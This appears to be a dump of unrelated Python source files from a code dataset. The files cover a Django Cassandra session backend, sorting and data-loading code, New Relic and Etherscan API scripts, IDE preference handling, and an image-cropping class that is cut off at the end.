django.core.exceptions import ImproperlyConfigured\nfrom django.utils.encoding import force_unicode\nfrom django.contrib.sessions.backends.base import SessionBase, CreateError\n\nCASSANDRA_POOL = getattr(settings, 'CASSANDRA_POOL', None)\nCASSANDRA_SESSION_KEYSPACE = getattr(settings, 'CASSANDRA_SESSION_KEYSPACE', None)\n\nif CASSANDRA_POOL is None or CASSANDRA_SESSION_KEYSPACE is None:\n raise ImproperlyConfigured(u'To use cassandra-sessions, you must first set the CASSANDRA_SESSION_KEYSPACE and CASSANDRA_POOL settings in your settings.py')\nelse:\n try:\n lazyboy.connection.get_pool(CASSANDRA_SESSION_KEYSPACE)\n except lazyboy.exceptions.ErrorCassandraClientNotFound:\n lazyboy.connection.add_pool(CASSANDRA_SESSION_KEYSPACE, CASSANDRA_POOL)\n\nclass SessionStore(SessionBase):\n \"\"\"\n A Cassandra-based session store.\n \"\"\"\n \n def get_session(self, session_key):\n logging.debug('Getting session: %s' % session_key)\n session = None\n if session_key:\n try:\n key = Key(\n keyspace=CASSANDRA_SESSION_KEYSPACE,\n column_family=\"Sessions\",\n key=session_key\n )\n record = lazyboy.record.Record()\n session_record = record.load(key)\n session_values = session_record.values()\n if session_values:\n session = session_values[0]\n except lazyboy.exceptions.ErrorNoSuchRecord:\n pass\n return session\n \n def load(self):\n session_data = self.get_session(self.session_key)\n if session_data is not None:\n expiry, data = int(session_data[:15]), session_data[15:]\n if expiry < time.time():\n return {}\n else:\n return self.decode(force_unicode(data))\n self.create()\n return {}\n \n def create(self):\n while True:\n self.session_key = self._get_new_session_key()\n try:\n self.save()\n except CreateError:\n continue\n self.modified = True\n return\n \n def save(self, must_create=True):\n data = self.encode(self._get_session(no_load=True))\n encoded = '%15d%s' % (int(time.time()) + self.get_expiry_age(), data)\n key = Key(\n keyspace=CASSANDRA_SESSION_KEYSPACE,\n column_family=\"Sessions\",\n key=self.session_key\n )\n record = lazyboy.record.Record()\n record.key = key\n record[self.session_key] = encoded\n record.save()\n \n def exists(self, session_key):\n session_data = self.get_session(session_key)\n if session_data is not None:\n expiry, data = int(session_data[:15]), session_data[15:]\n if expiry < time.time():\n return False\n else:\n return True\n return False\n \n def delete(self, session_key=None):\n if session_key is None:\n if self._session_key is None:\n return\n session_key = self._session_key\n key = Key(\n keyspace=CASSANDRA_SESSION_KEYSPACE,\n column_family=\"Sessions\",\n key=session_key\n )\n # make this session expire right now\n data = self.encode({})\n encoded = '%15d%s' % (int(time.time()), data)\n record = lazyboy.record.Record()\n record.key = key\n record[self.session_key] = encoded\n record.save()","sub_path":"cassandra_sessions/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"91938474","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n'''\n@File : 10_希尔排序.py\n@Time : 2019/4/7 22:01:52\n@Author : LJL\n@Version : 1.0\n@Email : 491692391@qq.com\n@License : (C)Copyright 2019-2100, LJL\n@Desc : None\n\n'''\n# here put the import lib\n\n\nimport random\n\n\ndef shell_sort(alist):\n \"\"\"希尔排序\"\"\"\n n = len(alist)\n gap = n // 2\n while gap >= 1:\n for i in range(gap, n):\n for j in range(i, 0, -gap):\n if alist[j] < alist[j-gap]:\n alist[j], alist[j-gap] = alist[j-gap], alist[j]\n else:\n break\n gap //= 2\n\n return alist\n\n\nif __name__ == '__main__':\n list_test = [random.randint(0, 100) for i in range(random.randint(8, 15))]\n print('原来的列表:\\t{}'.format(list_test))\n print('sorted排序:\\t{}'.format(sorted(list_test)))\n insert_list = shell_sort(list_test)\n print('自定义排序:\\t{}'.format(list_test))","sub_path":"数据结构与算法/10_希尔排序.py","file_name":"10_希尔排序.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"150213399","text":"# encoding: utf-8\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom .datasets import init_dataset, ImageDataset, ImageNoLabelDataset\nfrom .triplet_sampler import RandomIdentitySampler\nfrom .transforms import build_transforms\n\n# ASK :\ndef train_collate_fn(batch):\n imgs, pids, _, _, = zip(*batch)\n pids = torch.tensor(pids, dtype=torch.int64)\n return torch.stack(imgs, dim=0), pids\n\ndef val_collate_fn(batch):\n imgs, pids, camids, _ = zip(*batch)\n return torch.stack(imgs, dim=0), pids, camids\n\ndef val_no_label_collate_fn(batch) :\n imgs, camids, dates, _ = zip(*batch)\n return torch.stack(imgs, dim=0), camids, dates\n\ndef make_data_loader(cfg):\n transforms = build_transforms(cfg)\n dataset = init_dataset(cfg.DATASETS.NAMES, root=cfg.DATASETS.ROOT_DIR)\n num_workers = cfg.DATALOADER.NUM_WORKERS\n if cfg.VISUALIZE.OPTION == \"on_no_label\" :\n gallery_set = ImageNoLabelDataset( dataset.gallery, transforms['eval'])\n print(gallery_set.dataset[0])\n data_loader={}\n data_loader['gallery'] = DataLoader(\n gallery_set, batch_size=cfg.VISUALIZE.IMS_PER_BATCH, shuffle=False, num_workers=num_workers,\n collate_fn=val_no_label_collate_fn\n )\n return data_loader\n # number of identities\n num_classes = dataset.num_train_pids\n train_set = ImageDataset(dataset.train, transforms['train'])\n data_loader={}\n # ASK : what is PK_SAMPLER, collate_fm\n if cfg.DATALOADER.PK_SAMPLER == 'on':\n data_loader['train'] = DataLoader(\n train_set, batch_size=cfg.SOLVER.IMS_PER_BATCH,\n sampler=RandomIdentitySampler(dataset.train, cfg.SOLVER.IMS_PER_BATCH, cfg.DATALOADER.NUM_INSTANCE),\n num_workers=num_workers, collate_fn=train_collate_fn\n )\n else:\n data_loader['train'] = DataLoader(\n train_set, batch_size=cfg.SOLVER.IMS_PER_BATCH, shuffle=True, num_workers=num_workers,\n collate_fn=train_collate_fn\n )\n\n eval_set = ImageDataset(dataset.query + dataset.gallery, transforms['eval'])\n data_loader['eval'] = DataLoader(\n eval_set, batch_size=cfg.TEST.IMS_PER_BATCH, shuffle=False, num_workers=num_workers,\n collate_fn=val_collate_fn\n )\n if cfg.VISUALIZE.OPTION == \"on\" and cfg.EMBEDDING_PROJECTOR.OPTION == \"off\" :\n query_set = ImageDataset(dataset.query , transforms['eval'])\n gallery_set = ImageDataset( dataset.gallery, transforms['eval'])\n data_loader['query'] = DataLoader(\n query_set, batch_size=cfg.VISUALIZE.IMS_PER_BATCH, shuffle=False, num_workers=num_workers,\n collate_fn=val_collate_fn\n )\n data_loader['gallery'] = DataLoader(\n gallery_set, batch_size=cfg.VISUALIZE.IMS_PER_BATCH, shuffle=False, num_workers=num_workers,\n collate_fn=val_collate_fn\n )\n \n return data_loader, len(dataset.query), num_classes\n","sub_path":"data/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"453389950","text":"# ==================================================\n# CONTENTS\n # Overview\n # Chat Bot\n# ==================================================\n\n\n# Overview\ndef read_file( filepath ):\n with open( filepath ) as f:\n str_text = f.read()\n\n return str_text\n\n# read_file( '.\\\\docs\\\\moby_dick_four_chapters.txt' )\nimport spacy \n\nnlp = spacy.load( 'en', disable = [ 'parser', 'tagger', 'ner' ] )\nnlp.max_length = 1198623\n\ndef seperate_punctuation( doc_text ):\n return [ token.text.lower() for token in nlp( doc_text ) if token.text not in '\\n\\n \\n\\n\\n!\"-#$%&()--.*+,-/:;<=>?@[\\\\]^_`{|}~\\t\\n ' ]\n\nd = read_file( '.\\\\docs\\\\moby_dick_four_chapters.txt' )\ntokens = seperate_punctuation( d )\n\n# Predict next word from previously supplied words\ntrain_len = 25 + 1\n\ntext_sequences = []\n\nfor i in range( train_len, len(tokens) ):\n seq = tokens[ i - train_len:i ]\n text_sequences.append( seq )\n\nfrom keras.preprocessing.text import Tokenizer\n\ntokenizer = Tokenizer()\n\ntokenizer.fit_on_texts( text_sequences )\nsequences = tokenizer.texts_to_sequences( text_sequences )\n\nfor i in sequences[0]:\n print( f'{i} : {tokenizer.index_word[i]}' )\n\nvocabulary_size = len( tokenizer.word_counts )\nvocabulary_size\n\nimport numpy as np \n\nsequences = np.array( sequences )\nsequences\n\n\n# Chat Bot\n# ==================================================\n","sub_path":"notebooks/nltk/deep_learning_nlp.py","file_name":"deep_learning_nlp.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"497782869","text":"#!/usr/bin/python\n\nimport json\nimport requests\nimport re\nfrom widgets.markdown import markdown_test\nfrom widgets.apm_errors import apmErrorGraph\nfrom widgets.apm_apdex import apmApdex\nfrom widgets.db_cpu_usage import dbCPUUsage\nfrom widgets.db_mem_usage import dbMemUsage\nfrom widgets.db_disk_usage import dbDiskUsage\n\ndef setoverviewdashboard(project, tier, key):\n API_ENDPOINT = 'https://api.newrelic.com/graphql'\n headers = {\n \"Api-Key\": key,\n \"Content-Type\": \"application/json\"\n }\n\n def getDashboard():\n # search for existing dashboards with the same name \n data = {'query':'{actor {'\n 'entitySearch(query: \"name = \\'' + project.title() + ' Overview: ' + tier.lower() + '\\' AND type IN (\\'DASHBOARD\\')\") {'\n 'results {'\n 'entities {'\n 'guid,'\n '}'\n '}'\n '}'\n '}}'}\n\n try:\n response = requests.post(API_ENDPOINT, headers=headers, data=json.dumps(data), allow_redirects=False)\n except requests.exceptions.RequestException as e:\n raise SystemExit(e)\n\n return(re.search('\"guid\":\"(.*)\"', response.text))\n\n # Set Dashboard Data - this is the data that will be added to the overview dashboard\n # markdown widget\n markdownWidget = markdown_test(project, tier)\n\n # APM errors\n apmErrorWidget = apmErrorGraph(project, tier, key)\n # APM apdex\n apmApdexWidget = apmApdex(project, tier, key)\n\n # DB CPU Usage\n dbCPUUsageWidget = dbCPUUsage(project, tier)\n # DB Memeory Usage\n dbMemUsageWidget = dbMemUsage(project, tier)\n # DB Disk Usage\n dbDiskUsageWidget = dbDiskUsage(project, tier)\n\n dash_data = ', dashboard: {'\\\n 'name: \"' + project.title() + ' Overview: ' + tier.lower() + '\",'\\\n 'permissions: PUBLIC_READ_ONLY,'\\\n 'pages: {'\\\n 'name: \"page_1\",'\\\n 'widgets: ['\\\n '' + markdownWidget + ','\\\n '' + apmErrorWidget + ','\\\n '' + apmApdexWidget + ','\\\n '' + dbCPUUsageWidget + ','\\\n '' + dbMemUsageWidget + ','\\\n '' + dbDiskUsageWidget + ''\\\n ']'\\\n '}'\\\n '}){'\\\n 'errors {'\\\n 'description,'\\\n 'type'\\\n '}'\\\n '}'\\\n '}'\n\n dash_guid = getDashboard()\n\n # set the query type for update or create\n if dash_guid:\n queryType = 'dashboardUpdate(guid: \"' + dash_guid.group(1) + '\"'\n pageGuid = dash_guid.group(1)\n else:\n queryType = 'dashboardCreate(accountId: 2292606'\n\n data = {'query':'mutation {' + queryType + dash_data}\n\n try:\n response = requests.post(API_ENDPOINT, headers=headers, data=json.dumps(data), allow_redirects=False)\n except requests.exceptions.RequestException as e:\n raise SystemExit(e)\n\n print('Dashboard added: {} {} Overview'.format(project, tier))","sub_path":"monitoring/dashboards/set_overview.py","file_name":"set_overview.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"396222633","text":"from etherscan.transactions import Transactions\r\nimport json\r\n\r\nwith open('C:/Yiru Xiong-Professional/实习/CryptoAlgoWheel/S1/task3/api_key.json', mode='r') as key_file:\r\n key = json.loads(key_file.read())['key']\r\n\r\n\r\ndef get_status(tx_hash):\r\n api = Transactions(api_key=key)\r\n status = api.get_status(tx_hash=tx_hash)\r\n print(status)\r\n# get_status('0x15f8e5ea1079d9a0bb04a4c58ae5fe7654b5b2b4463375ff7ffb490aa0032f3a')\r\n\r\n\r\ndef get_tx_receipt_status(tx_hash):\r\n api = Transactions(api_key=key)\r\n receipt_status = api.get_tx_receipt_status(tx_hash=tx_hash)\r\n print(receipt_status)\r\n# get_tx_receipt_status('0x513c1ba0bebf66436b5fed86ab668452b7805593c05073eb2d51d3a52f480a76')\r\n","sub_path":"section1/task3/S1_task3_transactions.py","file_name":"S1_task3_transactions.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"599106651","text":"sugar = int(input())\n\nif 3 < sugar < 5:\n print(\"-1\")\n\nelif sugar % 5 == 0 :\n print(sugar//5)\n\nelif sugar % 3 == 0 :\n if sugar < 10:\n print(sugar//3)\n else:\n for i in range(sugar):\n k = sugar - 5*i\n if 3<= k < 5:\n break\n print(i)\n\nelse:\n for i in range(sugar):\n k = sugar - 5*i #5로 나눈 나머지 값 -> sugar%5\n if k % 3 == 0 :\n print(i + k//3 )\n break\n else:\n print(\"-1\")\n break\n\n\n\n\nn = int(input())\n# 초기화\nfive = 0\nthree = 0\n \n# 최대 5kg의 갯수와 나머지를 구한다.\nfive = n//5\nb = n%5\n \n# 나머지가 0이 아니면 3kg 갯수를 구한다.\nif b !=0:\n while five >= 0:\n if b%3 == 0:\n three = b//3\n break\n five -= 1 #5로 나눈 나머지 값이 3의 배수가 아니면 -1 될때까지 빼준다\n b += 5 # 나머지가 3으로 나누어 떨어질때 까지 5를 더해서 다시 구한다.어떻게 이런 생각을?\n \nret=five + three\n \nif ret < 1:\n ret = -1\nprint(ret)\n\n\n\n# sugar = int(input())\n\n# k = sugar//5\n# j = sugar%5\n\n# if j != 0:\n# bag = 0\n# if j%3 == 0 :\n# bag = j //3\n# print(k + bag)\n \n# elif sugar%3 == 0 :\n# print(sugar//3)\n \n# elif\n \n# else:\n# print(\"-1\")\n\n# else:\n# print(k)\n \n\n\n\n\n\n\n\n# order = int(input())\n\n# if order % 5 == 0:\n# print(order // 5)\n\n# elif order % 5 == 3:\n# print(order // 5 + 1)\n\n# elif order // 5 - 1 >= 0 and order - (5 * (order // 5 - 1)) == 6:\n# print((order // 5 - 1) + 2)\n\n# elif order // 5 - 1 >= 0 and order - (5 * (order // 5 - 1)) == 9:\n# print((order // 5 - 1) + 3)\n\n# elif order // 5 - 2 >= 0 and order - (5 * (order // 5 - 2)) == 12:\n# print((order // 5 - 2) + 4)\n\n# else:\n# print(-1)\n\n\n\n\n\n\n\n\na = int(input())\nbox = 0\nwhile True:\n if a%5 ==0:\n box = box + (a//5)\n print(box)\n break\n a = a - 3\n box += 1\n if a < 0:\n print(\"-1\")\n break\n\n\n\n\n\n\n# def sugar(N) :\n# for y in range( (N//3)+1) :\n# for x in range( (N//5)+1 ) :\n# if ((5*x + 3*y) == N) :\n# return x+y\n \n# return -1\n\n# N = int(input()) #배달해야할 설탕 킬로그램 \n# print(sugar(N))\n","sub_path":"sugar.py","file_name":"sugar.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"197013949","text":"#-*- coding: utf-8 -*-\nfrom django.db import models\nfrom redko.functions import day_to_string, minute_to_string\n\nfrom shop.models import Shop\nfrom member.models import RedkoUser as User\n\n'''제휴추천'''\nclass Recommend(models.Model):\n shopname = models.CharField('가게명', max_length=200)\n location = models.CharField('대략적 위치', max_length=200)\n reason = models.TextField('추천 이유', blank=True)\n user = models.ForeignKey(User)\n created = models.DateTimeField(auto_now_add=True)\n\n def __unicode__(self):\n return '%s (%s) : %s' % (self.shopname, self.location, self.reason)\n def json(self):\n dict = {\n 'id': self.id,\n 'shopname': self.shopname,\n 'reason': self.reason,\n }\n class Meta:\n verbose_name = u'제휴 추천'\n verbose_name_plural = u'제휴 추천 목록'\n ordering = ['-created']\n\n'''불량 콘텐츠'''\nclass BadContent(models.Model):\n user = models.ForeignKey(User, related_name='user_set')\n bad_user = models.ForeignKey(User, related_name='bad_user_set')\n created = models.DateTimeField(auto_now_add=True)\n\n def __unicode__(self):\n return u'FromUser(%s) - BadUser(%s)' % (self.user, self.bad_user)\n class Meta:\n verbose_name = u'불량 콘텐츠'\n verbose_name_plural = u'불량 콘텐츠 목록'\n ordering = ['-created']\n\n'''잘못된 정보'''\nclass BadInfo(models.Model):\n shop = models.ForeignKey('shop.Shop')\n user = models.ForeignKey(User)\n bad_info = models.TextField('잘못된 정보', blank=True)\n correct_info = models.TextField('정정된 정보', blank=True)\n created = models.DateTimeField(auto_now_add=True)\n\n def __unicode__(self):\n return u'%s (User:%s)' % (self.shop.title, self.user)\n class Meta:\n verbose_name = u'잘못된 정보'\n verbose_name_plural = u'잘못된 정보 목록'\n ordering = ['-created']\n\n'''불편 신고'''\nclass Discomfort(models.Model):\n user = models.ForeignKey(User)\n shop = models.ForeignKey(Shop)\n type = models.CharField(max_length=200, blank=True)\n content = models.TextField(blank=True)\n created = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n verbose_name = u'불편 신고'\n verbose_name_plural = u'불편 신고 목록'\n ordering = ['-created']","sub_path":"support/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"82453072","text":"\"\"\"Programmatic interface to default and user-defined preferences.\n\nSee the preferences documentation for more info.\"\"\"\n\nfrom __future__ import print_function\n\nimport collections\nimport cPickle as pickle\nimport os\nimport tempfile\nimport threading\nfrom contextlib import contextmanager\nfrom itertools import dropwhile\nfrom os.path import join, pardir, isdir, isfile, dirname\nfrom pprint import pprint\n\nimport plat\nimport settings\nfrom plat import OS, OSX, WINXP, LINUX32, LINUX64\nfrom plat import USER_PREFS_FILE as user_prefs\nfrom util import die\n\nif OS == OSX: import _prefs_osx as _plat_prefs\nelif OS == WINXP: import _prefs_winxp as _plat_prefs\nelif OS == LINUX32: import _prefs_linux32 as _plat_prefs\nelif OS == LINUX64: import _prefs_linux64 as _plat_prefs\nelse: die('unknown OS: {0}', OS)\n\n_DEBUG = False\n\n# -- Locking primitives ------------------------------------------------------#\n\ndef __pref_locked():\n # python closures suck\n lock = [threading.Lock()]\n def pref_locked():\n lock[0].acquire()\n try:\n yield\n except:\n raise\n finally:\n lock[0].release()\n return pref_locked\n\n# Context manager for acquiring the lock, doing something, releasing it\npref_locked = contextmanager(__pref_locked())\n\ndef pref_atomic(f):\n def atomic(*args, **kwargs):\n with pref_locked():\n return f(*args, **kwargs)\n return atomic\n\n# -- Thread-safe functions ---------------------------------------------------#\n\n@pref_atomic\ndef preference(key):\n global _prefs\n return _prefs[key]\n\n@pref_atomic\ndef preference_with_default(key, default):\n global _prefs\n try: return _prefs[key]\n except: return default\n\n@pref_atomic\ndef has_preference(key):\n global _prefs\n return key in _prefs\n\n@pref_atomic\ndef save():\n global _prefs\n _unsafe_save_prefs()\n\n@pref_atomic\ndef set_and_save(pref_dict):\n global _prefs\n global _watchers\n delta = {}\n for pref, val in pref_dict.iteritems():\n if val != _prefs[pref]:\n _prefs[pref] = val\n delta[pref] = val\n if delta:\n if _DEBUG: print('delta:', delta)\n _unsafe_save_prefs()\n for w in _watchers:\n if hasattr(w, 'preferences_changed'):\n w.preferences_changed(delta)\n else:\n w(delta)\n elif _DEBUG:\n print('no delta')\n\n@pref_atomic\ndef register_change_watcher(watcher):\n \"\"\"Register a change listener on the user preferences.\n\n This can be an object with a callable 'preferences_changed'\n attribute, or a callable. When user preferences get changed\n through the use of this module, either the\n watcher.preferences_changed gets called, or, if that doesn't\n exist, watcher itself is called, with argument a dictionary from\n the changed preferences to their new values.\n\n Try not to use this; do so only if you're interacting with some\n third party code that needs to keep current.\"\"\"\n global _watchers\n _watchers.append(watcher)\n\n# -- Global defaults (platform-specific in _plat_prefs) ----------------------#\n\n# General info for a preferences.\n#\n# desc: (Short) string description\n#\n# help: Longer description\n#\n# group: Preference group ('Compilation', 'General', etc.)\n#\n# type: Kind of preference, (currently) one of: ['path', 'dir',\n# 'bool', 'int', 'options']. The last of these ('options') has a\n# \"values\" key in its extra data.\n#\n# advanced: counts as an advanced preference\n#\n# data: Extra data associated with the preference.\n#\n# pickle: whether or not to pickle this preference (FIXME this is dumb\n# and exists only for the build directory; the preference should be\n# \"use my build directory or not\", and if so, then etc. same for \"use\n# my make\")\npcfg = collections.namedtuple('pcfg',\n ' '.join(['desc', 'help', 'group', 'type',\n 'advanced', 'pickle', 'data']))\n\nPREF_CONFIG = \\\n{'build_dir':\n pcfg(u'Parent build directory',\n u'When a sketch is compiled, its build directory will be a ' + \\\n u'child of this directory.',\n u'Compilation', 'dir', False, False, {}),\n\n 'build_dir_delete_on_exit':\n pcfg(u'Delete parent build directory on exit',\n u'If enabled, deletes the parent build directory on IDE exit.',\n u'General', 'bool', False, True, {}),\n\n 'editor_emacs_keybindings':\n pcfg(u'Emacs keybindings',\n u'Enable some Emacs-style keybindings in the editor.',\n u'Editor', 'bool', False, True, {}),\n\n 'editor_insert_tabs':\n pcfg(u'Allow tabs',\n u'Whether or not the editor will insert literal TAB characters. '\n u'If disabled, the editor will insert an equivalent number of '\n u'spaces when the TAB key is pressed.',\n u'Editor', 'bool', False, True, {}),\n\n 'editor_tab_indents_line':\n pcfg(u'Tab indents line',\n u'If enabled pressing the tab key will indent the line, rather '\n u'than inserting a tab character or equivalent number of spaces.',\n u'Editor', 'bool', False, True, {}),\n\n 'editor_tab_width':\n pcfg(u'Tab width', u'Number of spaces to display for one tab.',\n u'Editor', 'int', True, True, {}),\n\n 'lib_maple_home':\n pcfg(u'libmaple home',\n u'Path to the libmaple source tree to compile against. '\n u'Default is the version bundled with MapleIDE, which has the '\n u'same version number as the IDE itself.',\n u'Compilation', 'dir', False, True, {}),\n\n 'make_path':\n pcfg(u'Path to make',\n u'Absolute path to the make executable. '\n u'Default is the version bundled with MapleIDE. '\n u'\\n\\n'\n u\"Make is a program used during compilation. If you're \"\n u\"unfamiliar with it, the default is probably best.\",\n u'Compilation', 'path', False, True, {}),\n\n 'board':\n pcfg(u'Board', u'Default board to compile to.',\n 'Compilation', 'options', True, True,\n {'values': [u'Maple', u'Maple Mini', u'Maple Native']}),\n\n 'memory_target':\n pcfg(u'Memory Target',\n u'Default for where the compiled sketch will reside on your board.',\n u'Compilation', 'options', True, True,\n {'values': [u'RAM', u'Flash']}),\n\n 'sketchbook':\n pcfg(u'Sketchbook', u\"Directory containing your sketches.\",\n u'General', 'dir', True, True, {}),\n\n 'user_libs':\n pcfg(u'Libraries', u\"Directory containing your extra libraries.\",\n u'General', 'dir', True, True, {}),\n }\n\n# Defaults delayed in order to prevent unintended side effects.\n_global_defaults = {\n 'build_dir': lambda: tempfile.mkdtemp(prefix=u'maple-build'),\n 'build_dir_delete_on_exit': lambda: True,\n 'editor_emacs_keybindings': lambda: False,\n 'editor_insert_tabs': lambda: False,\n 'editor_tab_indents_line': lambda: False,\n 'editor_tab_width': lambda: 4,\n 'lib_maple_home': lambda: join(settings.DEPENDENCIES_DIR, u'libmaple'),\n 'make_path': lambda: join(settings.DEPENDENCIES_DIR,\n plat.OS, u'make', u'bin', u'make'),\n 'board': lambda: 'Maple',\n 'memory_target': lambda: 'Flash'\n }\n\n# -- Unsafe functions --------------------------------------------------------#\n\ndef _unsafe_load_prefs(): # TODO error handling\n # assumes you've got the lock already\n pref_dict = {}\n\n defaults = _global_defaults.copy()\n defaults.update(_plat_prefs.platform_defaults)\n\n if not isfile(user_prefs):\n # no user prefs, force all delays\n for p in PREF_CONFIG: pref_dict[p] = defaults[p]()\n\n # make a new user prefs file, at least the parts we want\n _unsafe_save_prefs(pref_dict)\n\n if _DEBUG:\n print('pickled prefs:')\n pprint(to_pickle)\n\n else:\n with open(user_prefs, 'rb') as f_in:\n user_dict = pickle.load(f_in)\n\n for p in PREF_CONFIG:\n if p in user_dict: pref_dict[p] = user_dict[p]\n else: pref_dict[p] = defaults[p]()\n\n if _DEBUG:\n print('all prefs:')\n pprint(pref_dict)\n\n return pref_dict\n\ndef _unsafe_save_prefs(pref_dict=None):\n if pref_dict is None:\n global _prefs\n pref_dict = _prefs\n if not isdir(dirname(user_prefs)): os.makedirs(dirname(user_prefs))\n\n to_pickle = dict((p, v) for (p, v) in pref_dict.iteritems() \\\n if PREF_CONFIG[p].pickle)\n\n if _DEBUG:\n print('saving preferences:', to_pickle)\n\n with open(user_prefs, 'wb') as f_out:\n pickle.dump(to_pickle, f_out)\n\n# -- Initialization ----------------------------------------------------------#\n\nwith pref_locked():\n _prefs = _unsafe_load_prefs()\n\n# change listeners; they get notified when a preference changes\n_watchers = []\n","sub_path":"src/settings/preferences.py","file_name":"preferences.py","file_ext":"py","file_size_in_byte":8803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"322647998","text":"from .... import level\nfrom .... import base\nclass lvl(level.level):\n def __init__(self, manager, index):\n level.level.__init__(self, manager, index)\n self.blocks[\"#\"] = base.stone\n self.blocks[\">\"] = base.stairsDown\n self.blocks[\"<\"] = base.stairsUp\n self.blocks[\"w\"] = base.woodFloor\n self.levelimp = \"\"\"\\\n############\n# www#\n# #\n# ? > #\n# #\n# #\n# #\n# C #\n# #\n# #\n# #\n############\"\"\"\n self.messageBox = base.messageBox((3 * 32, 3 * 32), self.index)\n self.messageBox.msg = \"\"\"\\\nWelcome to Evergreen!\nYou probably already know the controls if you managed\nto hit the block, but here goes nothing:\nWASD - Move\nSpace - Attack/Interact\nAnd that's it. This is really the most redundant help\nmessage ever, as in order to see it you need the information\nthat it contains. Maybe later we can have nicer things.\nAnyway, try walking over to the down portal (the red portal\norb thing) and interacting with it.\"\"\"\n self.blockState.add(self.messageBox)\n self.loadLevel()\n","sub_path":"trunk/src/server/levels/intro/floor1.py","file_name":"floor1.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"354737493","text":"from PIL import Image as pilIm\nfrom PySide6.QtGui import QImage, qRgb\n\n\n# Default sizes for images\nORIG_SCALED_SIZE = (250, 250)\nCROPPED_SCALED_SIZE = (250, 250)\n\nKNOWN_CONCENTRATION = -1\nUNITS = ''\n\n\n# A class that stores the entries of an image\nclass Image:\n\n UNSPECIFIED_IMAGE = \"UNSPECIFIED\"\n BLANK_VOLUME = \"BLANK_VOLUME\"\n STANDARD_VOLUME = \"STANDARD_VOLUME\"\n\n MOST_RECENT_MAX_X = -1\n MOST_RECENT_MIN_X = -1\n MOST_RECENT_MAX_Y = -1\n MOST_RECENT_MIN_Y = -1\n\n def __init__(self, file_name, volume=0):\n self.file_name = file_name\n\n self.min_x = Image.MOST_RECENT_MIN_X\n self.min_y = Image.MOST_RECENT_MIN_Y\n self.max_x = Image.MOST_RECENT_MAX_X\n self.max_y = Image.MOST_RECENT_MAX_Y\n\n self.volume = volume\n\n self.avg_value = (-1, -1, -1)\n\n def set_coordinates(self, min_x, min_y, max_x, max_y):\n if min_x >= max_x or min_y >= max_y:\n raise ValueError\n self.min_x = min_x\n self.min_y = min_y\n self.max_x = max_x\n self.max_y = max_y\n Image.MOST_RECENT_MAX_Y = max_y\n Image.MOST_RECENT_MIN_Y = min_y\n Image.MOST_RECENT_MAX_X = max_x\n Image.MOST_RECENT_MIN_X = min_x\n self.compute_avg_color()\n\n def is_valid_coordinates(self):\n im = pilIm.open(self.file_name)\n return 0 <= self.min_x < self.max_x < im.size[1] and 0 <= self.min_y < self.max_y < im.size[0]\n\n def set_volume(self, volume):\n self.volume = volume\n\n def compute_avg_color(self):\n im = pilIm.open(self.file_name)\n cropped = im.crop((self.min_x, self.min_y, self.max_x, self.max_y))\n\n pixels = cropped.load()\n red = 0\n green = 0\n blue = 0\n for i in range(cropped.size[0]):\n for j in range(cropped.size[1]):\n red += pixels[i, j][0]\n green += pixels[i, j][1]\n blue += pixels[i, j][2]\n\n pix_count = cropped.size[0] * cropped.size[1]\n self.avg_value = (red / pix_count, green / pix_count, blue / pix_count)\n\n def get_original(self):\n return pilIm.open(self.file_name)\n\n def get_marked_scaled_original(self):\n if not self.is_valid_coordinates():\n return self.get_scaled_original()\n else:\n orig = self.get_original()\n scaled = self.get_scaled_original()\n pix = scaled.load()\n\n max_x = int(self.max_x / orig.size[1] * scaled.size[1])\n min_x = int(self.min_x / orig.size[1] * scaled.size[1])\n\n max_y = int(self.max_y / orig.size[0] * scaled.size[0])\n min_y = int(self.min_y / orig.size[0] * scaled.size[0])\n\n for i in range(scaled.size[1]):\n pix[min_x, i] = (0, 0, 0)\n pix[max_x, i] = (0, 0, 0)\n for j in range(scaled.size[0]):\n pix[j, min_y] = (0, 0, 0)\n pix[j, max_y] = (0, 0, 0)\n return scaled\n\n def get_cropped(self):\n if not self.is_valid_coordinates():\n return self.get_original()\n else:\n return self.get_original().crop((self.min_x, self.min_y, self.max_x, self.max_y))\n\n def get_scaled_original(self, scale=ORIG_SCALED_SIZE):\n im = self.get_original()\n scaling_factor = max(im.size[0], im.size[1])\n scaled_x = scale[0] * im.size[0] // scaling_factor\n scaled_y = scale[1] * im.size[1] // scaling_factor\n return im.resize((scaled_x, scaled_y))\n\n def get_scaled_cropped(self, scale=CROPPED_SCALED_SIZE):\n im = self.get_cropped()\n scaling_factor = max(im.size[0], im.size[1])\n scaled_x = scale[0] * im.size[0] // scaling_factor\n scaled_y = scale[1] * im.size[1] // scaling_factor\n return im.resize((scaled_x, scaled_y))\n\n\nblank = Image.UNSPECIFIED_IMAGE\nstandard = Image.UNSPECIFIED_IMAGE\nmid_images = []\n\n\ndef clear_images():\n global blank\n global standard\n global mid_images\n blank = Image.UNSPECIFIED_IMAGE\n standard = Image.UNSPECIFIED_IMAGE\n mid_images = []\n\n\ndef add_blank(image):\n global blank\n blank = image\n\n\ndef add_standard(image, concentration, 